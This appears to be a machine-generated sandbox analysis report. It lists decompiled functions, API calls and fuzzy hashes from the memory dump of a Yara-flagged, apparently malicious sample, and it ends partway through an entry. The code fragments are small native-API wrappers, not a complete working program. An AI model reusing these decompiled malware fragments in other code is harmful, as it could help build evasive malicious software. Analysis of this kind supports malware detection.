                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                    0x00419d6f
                                                    0x00419d77
                                                    0x00419dad
                                                    0x00419db1

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00419F3A(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t22;

				_push(ds);
				asm("fidivr word [ecx-0x74aa11b9]");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A960(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                    0x00419f3b
                                                    0x00419f3c
                                                    0x00419f43
                                                    0x00419f4f
                                                    0x00419f57
                                                    0x00419f79
                                                    0x00419f7d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 1e3e6936e319047e10f674618f88f1c2d9ae32cb0b837a0a0bfa9aeb937e86f7
                                                    • Instruction ID: 99e2b47d8edbb5182db702a2a8800b4112e1cba9951a8e21b3c42ee475de6324
                                                    • Opcode Fuzzy Hash: 1e3e6936e319047e10f674618f88f1c2d9ae32cb0b837a0a0bfa9aeb937e86f7
                                                    • Instruction Fuzzy Hash: C2F058B1200108BFCB14CF89CC80EE777A9EF88354F118649FA0C97241C631E811CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                    0x00419f4f
                                                    0x00419f57
                                                    0x00419f79
                                                    0x00419f7d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419E8C, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: c98079bd786159e6e388f71d477312841dd75f7501de2e29763a30b1fc45bf42
                                                    • Instruction ID: 6da4df18c9f217fe1ee395c4294961a68adc49b756b315c7d7ad786ca3101eed
                                                    • Opcode Fuzzy Hash: c98079bd786159e6e388f71d477312841dd75f7501de2e29763a30b1fc45bf42
                                                    • Instruction Fuzzy Hash: 33E0C271200204BBEB10EFE5CC85FEB7B68EF54764F15456EFA0CAB242D230E5418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 85638cc8fad4fb70919e8eaa117fb27b283e59e174425d9cbb0e11745f58cb58
                                                    • Instruction ID: 1037eac0604e0906d10f856768fb270a1be5565f34fea4818fb4190b3d77bf8d
                                                    • Opcode Fuzzy Hash: 85638cc8fad4fb70919e8eaa117fb27b283e59e174425d9cbb0e11745f58cb58
                                                    • Instruction Fuzzy Hash: EE9002B124100402D1407199C404B461095B7D0341F51C411E5455958EC6998DD576A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8e0cd4fdd1c7d91cac3ba69aef9b522dd36943cd32ce69e8935d8db7e1559e06
                                                    • Instruction ID: 2786bcdd64e76bb58f891a7aec576c185762fd050cf2a255a5bbef7a0f1d4326
                                                    • Opcode Fuzzy Hash: 8e0cd4fdd1c7d91cac3ba69aef9b522dd36943cd32ce69e8935d8db7e1559e06
                                                    • Instruction Fuzzy Hash: 1C9002A138100442D1007199C414F061095F7E1341F51C415E1455958DC659CC527166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 659beb9ed867d64b72130adbbcb9ae34fba83127751b5831638ffcc5a959b3ed
                                                    • Instruction ID: b6d52b752871bd4e479429cd1e83b6f7dedcc47c22a8d06e223ac3e972a0a04a
                                                    • Opcode Fuzzy Hash: 659beb9ed867d64b72130adbbcb9ae34fba83127751b5831638ffcc5a959b3ed
                                                    • Instruction Fuzzy Hash: B2900261282041525545B199C4049075096B7E0281791C412E1805D54CC5669856E661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: fa6a590084d5a774284627cf27b0fb031445ee6b32500c0187e231c06ea1438a
                                                    • Instruction ID: 28cfe50064076c292fec20b8a89aae94e14d4a6c7393d3065be61aa367779b35
                                                    • Opcode Fuzzy Hash: fa6a590084d5a774284627cf27b0fb031445ee6b32500c0187e231c06ea1438a
                                                    • Instruction Fuzzy Hash: 6B90027124100413D1117199C504B071099B7D0281F91C812E081595CDD6968952B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 19b7fbd481e792eba44bdcf2e509e1a826e530a53bfdcecdb4f0d202bee57352
                                                    • Instruction ID: f211351156de167d2d15d2e73895d195f32cc0bd2dc28b03f7d110912ac120b5
                                                    • Opcode Fuzzy Hash: 19b7fbd481e792eba44bdcf2e509e1a826e530a53bfdcecdb4f0d202bee57352
                                                    • Instruction Fuzzy Hash: 9C90026164100502D1017199C404A16109AB7D0281F91C422E1415959ECA658992B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d90a9f89015d4b78e46688b95eb9c17075329938e68bc38cd4a37469588c649f
                                                    • Instruction ID: ce4e74b92e71dbce0ff18ce3b00bc3e513d25df535cd20fa1cafb7a1ca6254f5
                                                    • Opcode Fuzzy Hash: d90a9f89015d4b78e46688b95eb9c17075329938e68bc38cd4a37469588c649f
                                                    • Instruction Fuzzy Hash: F190026125180042D20075A9CC14F071095B7D0343F51C515E0545958CC95588616561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ff2c05d9b9b95be7f1bb2455af6cfbef907c39062bb305cca1eb940477f8583d
                                                    • Instruction ID: 4e431e6f19e4ca6fbb19938db499f5bc1983e960321ac2100abdc510989036af
                                                    • Opcode Fuzzy Hash: ff2c05d9b9b95be7f1bb2455af6cfbef907c39062bb305cca1eb940477f8583d
                                                    • Instruction Fuzzy Hash: 3A90027124140402D1007199C814B0B1095B7D0342F51C411E1555959DC665885175B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 43a8384131672b4a2dcbbb45ee3d38865f49d61f60d14f89e70eb290d8b22d28
                                                    • Instruction ID: 6805b1cf79ae779b6b3d351bc1a755c60727a642d44d0b90f0b54a161f9bdc55
                                                    • Opcode Fuzzy Hash: 43a8384131672b4a2dcbbb45ee3d38865f49d61f60d14f89e70eb290d8b22d28
                                                    • Instruction Fuzzy Hash: 1C90026164100042414071A9C844D065095BBE1251751C521E0D89954DC599886566A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ea6a6d82b4436107f4834fb642b258c289b5153c9c410505f9c1a614bced0971
                                                    • Instruction ID: f3d9907f04227e8190ee20c3afd3cd8302a91502418f6a19de613fa39b96a8ec
                                                    • Opcode Fuzzy Hash: ea6a6d82b4436107f4834fb642b258c289b5153c9c410505f9c1a614bced0971
                                                    • Instruction Fuzzy Hash: DC900265251000030105B599870490710D6B7D5391351C421F1406954CD66188616161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c3a7255f31c04c6957220719b424892e119f9b29170972ee484b3c7a5be5c752
                                                    • Instruction ID: 0a67c8eebf9778067c078877c3df4d42e04e686e3bc77d01f3cee6a7d3fbb42a
                                                    • Opcode Fuzzy Hash: c3a7255f31c04c6957220719b424892e119f9b29170972ee484b3c7a5be5c752
                                                    • Instruction Fuzzy Hash: 389002A12420000341057199C414A16509AB7E0241B51C421E1405994DC56588917165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 16c776c1cd17969cc28282003841f674d43bead080a5ecc8f5b47b935dc36fbb
                                                    • Instruction ID: b0dbdb9c391b6aef577f00679bfee10c069593f5eb8c302f343fa0c13e872ebd
                                                    • Opcode Fuzzy Hash: 16c776c1cd17969cc28282003841f674d43bead080a5ecc8f5b47b935dc36fbb
                                                    • Instruction Fuzzy Hash: 5490027124100402D10075D9D408A461095B7E0341F51D411E5415959EC6A588917171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6c9852dd7ddd02405ee0fee81a003baa7a209091e246e9c8fd620f066914fff1
                                                    • Instruction ID: dfdb8f6e4be3a0c8baa73371204e3627f2be5199983f59e2fbd5d6571894948a
                                                    • Opcode Fuzzy Hash: 6c9852dd7ddd02405ee0fee81a003baa7a209091e246e9c8fd620f066914fff1
                                                    • Instruction Fuzzy Hash: 1690026925300002D1807199D408A0A1095B7D1242F91D815E040695CCC95588696361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b66cddf68b2b442dfec97c8cb3359501d62e968eee00c6031f7bae850e8ea0ff
                                                    • Instruction ID: 941ac11bb27b41e432e5db5ab61e61dbff02da47178bb3bfc6325a257b769aa3
                                                    • Opcode Fuzzy Hash: b66cddf68b2b442dfec97c8cb3359501d62e968eee00c6031f7bae850e8ea0ff
                                                    • Instruction Fuzzy Hash: 6390026134100003D1407199D418A065095F7E1341F51D411E0805958CD95588566262
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f7d56c603b06926b98f0f89fd77be6abea74ebffa2aed78dee3204b1aa517bac
                                                    • Instruction ID: 422587ccd056fe06e4318ef1aa9bc5fa48f28a56b284bf7f1624a846448a0cb0
                                                    • Opcode Fuzzy Hash: f7d56c603b06926b98f0f89fd77be6abea74ebffa2aed78dee3204b1aa517bac
                                                    • Instruction Fuzzy Hash: 9C90027124100802D1807199C404A4A1095B7D1341F91C415E0416A58DCA558A5977E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1ceddaa2d3a48fb02eb2d4a30251a09120dcfc716128a961ba528efa527760dd
                                                    • Instruction ID: f302204ff9dbcb59c57a15704b5cc38b2478e3ec64019097269cfc43e517a32a
                                                    • Opcode Fuzzy Hash: 1ceddaa2d3a48fb02eb2d4a30251a09120dcfc716128a961ba528efa527760dd
                                                    • Instruction Fuzzy Hash: CD90027124108802D1107199C404B4A1095B7D0341F55C811E4815A5CDC6D588917161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                    • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                    • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                    • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                    0x004082f0
                                                    0x004082ff
                                                    0x00408303
                                                    0x0040830e
                                                    0x0040831e
                                                    0x0040832e
                                                    0x00408333
                                                    0x0040833a
                                                    0x0040833d
                                                    0x0040834a
                                                    0x0040834c
                                                    0x0040834e
                                                    0x0040836b
                                                    0x0040836b
                                                    0x00000000
                                                    0x0040836d
                                                    0x00408372

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                    • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                    • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                    • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A0AA, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E0041A0AA(intOrPtr _a4, int _a8, void* _a73) {
				void* _t13;

				asm("loope 0x51");
				asm("adc dl, [ebp-0x75]");
				_t6 = _a4;
				E0041A960(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                    0x0041a0ad
                                                    0x0041a0af
                                                    0x0041a0b3
                                                    0x0041a0ca
                                                    0x0041a0d8

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: efebc6a30e51b2aa4de86ae9a7c9d89e57547fa4564066cff83aab6159ce26ab
                                                    • Instruction ID: dd496631c1f2cc90e9e9b98176d14c81f0c66b116a94532af9d6864d4d58034e
                                                    • Opcode Fuzzy Hash: efebc6a30e51b2aa4de86ae9a7c9d89e57547fa4564066cff83aab6159ce26ab
                                                    • Instruction Fuzzy Hash: AD015AB2204148ABCB14CFA9CC81DEB7BA9EF8C750F05864DFA4C97241C634E811CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x0041a07f
                                                    0x0041a087
                                                    0x0041a09d
                                                    0x0041a0a1

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x0041a047
                                                    0x0041a05d
                                                    0x0041a061

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x0041a1ea
                                                    0x0041a200
                                                    0x0041a204

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
